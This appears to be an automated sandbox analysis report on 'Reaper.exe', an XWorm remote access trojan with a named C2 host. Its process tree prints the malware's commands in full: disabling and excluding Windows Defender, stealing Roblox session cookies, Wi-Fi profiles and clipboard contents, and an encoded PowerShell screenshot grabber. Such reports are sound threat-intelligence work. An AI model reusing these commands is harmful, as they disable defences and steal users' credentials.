Resubmissions

20-04-2024 17:13

240420-vrrwwadh2z 10

12-03-2024 21:36

240312-1f3f5adc57 10

10-03-2024 04:41

240310-fbmjwscd28 10

10-03-2024 04:40

240310-fan2bscc93 10

10-03-2024 04:38

240310-e9wd1scc82 10

09-03-2024 07:38

240309-jghpnsdh88 10

Analysis

  • max time kernel
    143s
  • max time network
    186s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-03-2024 04:40

General

  • Target

    Reaper/Reaper/Reaper.exe

  • Size

    8.3MB

  • MD5

    79d145e3962e71bf725d15b4c0261dac

  • SHA1

    bc9d7a5a347fcefe3b3b81136e83af294bd489f4

  • SHA256

    0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d

  • SHA512

    2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df

  • SSDEEP

    196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg

Malware Config

Extracted

Family

xworm

C2

l838.ddns.net:3232

Attributes
  • Install_directory

    %AppData%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 3 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 20 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 47 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 44 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe
    "C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:760
    • C:\Users\Admin\AppData\Local\Temp\Reaper.exe
      "C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:1324
    • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
      "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:652
      • C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
        "C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3480
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3404
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4364
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3864
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1544
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3720
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:2360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3444
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:968
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4596
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4444
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2680
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4408
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3448
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4992
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:460
          • C:\Windows\system32\tree.com
            tree /A /F
            5⤵
              PID:4616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3948
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              5⤵
                PID:1384
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:5104
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                5⤵
                • Gathers system information
                PID:3960
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2692
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                5⤵
                  PID:5084
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                4⤵
                  PID:3264
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5248
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wa3vpgzd\wa3vpgzd.cmdline"
                      6⤵
                        PID:6064
                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD8B7.tmp" "c:\Users\Admin\AppData\Local\Temp\wa3vpgzd\CSC6F5D1669CD634925AD12FCBEB5E0DCBA.TMP"
                          7⤵
                            PID:1988
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:5144
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:5420
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          4⤵
                            PID:5624
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              5⤵
                                PID:5800
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                              4⤵
                                PID:5552
                                • C:\Windows\system32\attrib.exe
                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                  5⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:6100
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                4⤵
                                  PID:5844
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:5204
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    4⤵
                                      PID:6020
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        5⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2628
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      4⤵
                                        PID:2820
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          5⤵
                                            PID:3196
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          4⤵
                                            PID:4712
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              5⤵
                                                PID:5376
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                              4⤵
                                                PID:932
                                                • C:\Windows\system32\attrib.exe
                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                  5⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:5912
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                4⤵
                                                  PID:1988
                                                  • C:\Windows\system32\tasklist.exe
                                                    tasklist /FO LIST
                                                    5⤵
                                                    • Enumerates processes with tasklist
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5968
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                  4⤵
                                                    PID:6112
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                      5⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3744
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "getmac"
                                                    4⤵
                                                      PID:2096
                                                      • C:\Windows\system32\getmac.exe
                                                        getmac
                                                        5⤵
                                                          PID:5876
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI6522\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\WGDhX.zip" *"
                                                        4⤵
                                                          PID:4892
                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI6522\rar.exe
                                                            C:\Users\Admin\AppData\Local\Temp\_MEI6522\rar.exe a -r -hp"L8Ot" "C:\Users\Admin\AppData\Local\Temp\WGDhX.zip" *
                                                            5⤵
                                                            • Executes dropped EXE
                                                            PID:3864
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                          4⤵
                                                            PID:3188
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic os get Caption
                                                              5⤵
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3116
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                            4⤵
                                                              PID:2380
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic computersystem get totalphysicalmemory
                                                                5⤵
                                                                  PID:4340
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                4⤵
                                                                  PID:4272
                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                    wmic csproduct get uuid
                                                                    5⤵
                                                                      PID:1520
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                    4⤵
                                                                      PID:2996
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
